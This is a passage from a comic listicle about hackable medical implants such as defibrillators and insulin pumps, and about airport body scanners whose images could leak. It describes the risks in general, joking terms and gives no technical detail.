In some devices, like an implanted defibrillator, which shocks your heart back into activity if it ever seizes up, hackers can remotely shut off the device and wait for you to die or, if they just ain't got all day, send it into test mode instead -- where the pacemaker repeatedly delivers powerful, fatal shocks to the heart even when it's already beating just fine.
Via Wikimedia Commons
But if you enter the Konami Code ...
Diabetic implants like insulin pumps have proven to be another security risk: When hackers get access to one of these devices, they can mess with the levels being injected into the body, which, again, can have fatal consequences. Jay Radcliffe discovered this hack while he was dicking around with his own diabetic equipment. At first he thought it was "really cool" that he could just ditz around for a few minutes and gain access to computers within his own body. Then he realized that any bored teenager with the right skill set could have total mastery over whether he lives or dies.
Photos.com
"Hey Dad, how big was that insurance policy again?"
He doesn't sleep well these days, we expect.

#1. See You Naked

You know those full body scanners they have at airports now? They're essentially robots that strip-search you with science, staring right through your clothes to see if you're hiding a weapon or an embarrassing tattoo. But more disturbing than the simple fact that these pictures exist is the ease with which these X-ray devices can be hacked. Hackers can gain control of an airport's PC from hundreds of miles away and download these pictures in a flash, probably kick-starting a new half-transparent ghostporn fetish (and the Internet is already at near critical levels of fetish saturation).
Via Trailertrasher.com
Pictured: Critical fetish saturation.
The images these devices capture are supposed to be deleted immediately after security views them, but that's not always the case. Last year, images from an older type of full body scanner (slightly less naked-looking images) were leaked, and future privacy breaches like this are considered a very real threat. So if you're planning to travel by air in the future, maybe hit the gym, do a little waxing and be more selective about your underwear choices, because you never know who could be judging your naked body in the near future. (Us. It's probably going to be us.)

Oh yeah. This is ... hot?